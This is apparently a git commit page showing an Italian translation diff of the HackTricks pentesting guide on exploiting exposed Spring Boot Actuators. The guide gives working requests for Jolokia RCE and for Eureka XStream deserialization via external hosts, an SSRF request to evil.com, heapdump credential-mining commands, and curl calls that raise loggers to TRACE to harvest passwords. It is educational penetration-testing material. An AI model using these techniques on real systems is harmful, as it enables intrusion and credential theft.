maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/network-services-pentesting/pentesting-web/spring-a

Browse Source
This commit is contained in:
Translator 2025-09-03 16:50:47 +00:00
parent 7554bfcb19
commit f33f0cfddd
2 changed files with 401 additions and 300 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

577
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

124
src/network-services-pentesting/pentesting-web/spring-actuators.md
View File

@ -6,30 +6,30 @@
<figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure>
**Da** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png) **Da** \[**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
## Sfruttare i Spring Boot Actuators ## Sfruttare gli Actuators di Spring Boot
**Controlla il post originale da** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**] **Controlla il post originale da** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
### **Punti Chiave:** ### **Punti chiave:**
- I Spring Boot Actuators registrano endpoint come `/health`, `/trace`, `/beans`, `/env`, ecc. Nelle versioni da 1 a 1.4, questi endpoint sono accessibili senza autenticazione. Dalla versione 1.5 in poi, solo `/health` e `/info` sono non sensibili per impostazione predefinita, ma gli sviluppatori spesso disabilitano questa sicurezza. - Spring Boot Actuators registrano endpoint come `/health`, `/trace`, `/beans`, `/env`, ecc. Nelle versioni da 1 a 1.4 questi endpoint sono accessibili senza autenticazione. Dalla versione 1.5 in poi, di default solo `/health` e `/info` non sono considerati sensibili, ma gli sviluppatori spesso disabilitano questa protezione.
- Alcuni endpoint degli Actuator possono esporre dati sensibili o consentire azioni dannose: - Alcuni endpoint degli Actuator possono esporre dati sensibili o consentire azioni dannose:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, e `/heapdump`. - `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, e `/heapdump`.
- In Spring Boot 1.x, gli actuators sono registrati sotto l'URL radice, mentre in 2.x, sono sotto il percorso di base `/actuator/`. - In Spring Boot 1.x, gli actuator sono registrati sotto la root URL, mentre in 2.x si trovano sotto il path base `/actuator/`.
### **Tecniche di Sfruttamento:** ### **Tecniche di sfruttamento:**
1. **Esecuzione di Codice Remoto tramite '/jolokia'**: 1. **Remote Code Execution via '/jolokia'**:
- L'endpoint dell'actuator `/jolokia` espone la Jolokia Library, che consente l'accesso HTTP agli MBeans. - L'endpoint `/jolokia` degli actuator espone la Jolokia Library, che permette l'accesso HTTP agli MBeans.
- L'azione `reloadByURL` può essere sfruttata per ricaricare le configurazioni di logging da un URL esterno, il che può portare a XXE cieco o Esecuzione di Codice Remoto tramite configurazioni XML create ad hoc. - L'azione `reloadByURL` può essere sfruttata per ricaricare configurazioni di logging da un URL esterno, il che può portare a blind XXE o Remote Code Execution tramite configurazioni XML manipolate.
- URL di esempio per lo sfruttamento: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`. - Example exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Modifica della Configurazione tramite '/env'**: 2. **Modifica della configurazione via '/env'**:
- Se sono presenti le Spring Cloud Libraries, l'endpoint `/env` consente la modifica delle proprietà ambientali. - Se sono presenti le Spring Cloud Libraries, l'endpoint `/env` permette la modifica delle proprietà ambientali.
- Le proprietà possono essere manipolate per sfruttare vulnerabilità, come la vulnerabilità di deserializzazione XStream nel serviceURL di Eureka. - Le proprietà possono essere manipolate per sfruttare vulnerabilità, come la vulnerabilità di deserializzazione XStream in Eureka serviceURL.
- Richiesta POST di esempio per lo sfruttamento: - Example exploit POST request:
``` ```
POST /env HTTP/1.1 POST /env HTTP/1.1
@ -40,25 +40,101 @@ Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
``` ```
3. **Altre Impostazioni Utili**: 3. **Altre impostazioni utili**:
- Proprietà come `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, e `spring.datasource.tomcat.max-active` possono essere manipolate per vari sfruttamenti, come SQL injection o modifica delle stringhe di connessione al database. - Proprietà come `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, e `spring.datasource.tomcat.max-active` possono essere manipolate per vari exploit, come SQL injection o alterazione delle stringhe di connessione al database.
### **Informazioni Aggiuntive:** ### **Informazioni aggiuntive:**
- Un elenco completo degli actuators predefiniti può essere trovato [qui](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt). - Una lista esaustiva degli actuator di default può essere trovata [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- L'endpoint `/env` in Spring Boot 2.x utilizza il formato JSON per la modifica delle proprietà, ma il concetto generale rimane lo stesso. - L'endpoint `/env` in Spring Boot 2.x usa il formato JSON per la modifica delle proprietà, ma il concetto generale rimane lo stesso.
### **Argomenti Correlati:** ### **Argomenti correlati:**
1. **Env + H2 RCE**: 1. **Env + H2 RCE**:
- I dettagli su come sfruttare la combinazione dell'endpoint `/env` e del database H2 possono essere trovati [qui](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database). - Dettagli su come sfruttare la combinazione dell'endpoint `/env` e del database H2 sono disponibili [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
2. **SSRF su Spring Boot tramite Interpretazione Errata del Nome del Percorso**: 2. **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
- La gestione dei parametri di matrice (`;`) nel framework Spring negli URL HTTP può essere sfruttata per Server-Side Request Forgery (SSRF). - La gestione dei matrix parameters (`;`) nel pathname HTTP da parte del framework Spring può essere sfruttata per Server-Side Request Forgery (SSRF).
- Richiesta di esempio per lo sfruttamento: - Example exploit request:
```http ```http
GET ;@evil.com/url HTTP/1.1 GET ;@evil.com/url HTTP/1.1
Host: target.com Host: target.com
Connection: close Connection: close
``` ```
## HeapDump secrets mining (credentials, tokens, internal URLs)
Se `/actuator/heapdump` è esposto, di solito puoi recuperare uno snapshot completo dell'heap JVM che frequentemente contiene segreti in uso (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, ecc.).
- Download and quick triage:
```bash
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
# Decode any Basic credentials you find
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
```
- Deeper analysis with VisualVM and OQL:
- Apri heapdump in VisualVM, ispeziona le istanze di `java.lang.String` o esegui OQL per cercare segreti:
```
select s.toString()
from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
```
- Automated extraction with JDumpSpider:
```bash
java -jar JDumpSpider-*.jar heapdump
```
Risultati tipici ad alto valore:
- Oggetti Spring `DataSourceProperties` / `HikariDataSource` che espongono `url`, `username`, `password`.
- Voci `OriginTrackedMapPropertySource` che rivelano `management.endpoints.web.exposure.include`, porte dei servizi e Basic-Auth incorporato negli URL (es., Eureka `defaultZone`).
- Frammenti HTTP in chiaro di richiesta/risposta che includono `Authorization: Basic ...` catturati in memoria.
Tips:
- Usa una wordlist focalizzata su Spring per scoprire rapidamente gli actuator endpoints (es., SecLists spring-boot.txt) e verifica sempre se `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env` e `/actuator/configprops` sono anch'essi esposti.
- Le credenziali estratte dal heapdump spesso funzionano per servizi adiacenti e talvolta per utenti di sistema (SSH), quindi provale in modo esteso.
## Abusing Actuator loggers/logging to capture credentials
Se `management.endpoints.web.exposure.include` lo permette e `/actuator/loggers` è esposto, puoi aumentare dinamicamente i livelli di log a DEBUG/TRACE per i package che gestiscono l'autenticazione e il processamento delle request. Combinato con log leggibili (via `/actuator/logfile` o percorsi di log noti), questo può rivelare credenziali inviate durante i flussi di login (es., header Basic-Auth o parametri di form).
- Enumerate and crank up sensitive loggers:
```bash
# List available loggers
curl -s http://target/actuator/loggers | jq .
# Enable very verbose logs for security/web stacks (adjust as needed)
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
```
- Find where logs are written and harvest:
```bash
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
# Otherwise, query env/config to locate file path
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
```
- Genera traffico di login/autenticazione e analizza il log per credenziali. In setup microservice con un gateway a frontare l'autenticazione, abilitare TRACE per i package gateway/security spesso rende visibili header e corpi dei form. Alcuni ambienti generano persino traffico di login sintetico periodicamente, rendendo la raccolta banale una volta che il logging è verboso.
Note:
- Ripristina i livelli di log quando hai finito: `POST /actuator/loggers/<logger>` con `{ "configuredLevel": null }`.
- Se `/actuator/httpexchanges` è esposto, può anche mostrare metadata di request recenti che potrebbero includere header sensibili.
## References
- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations)
- [VisualVM](https://visualvm.github.io/)
- [JDumpSpider](https://github.com/whwlsfb/JDumpSpider)
- [0xdf HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}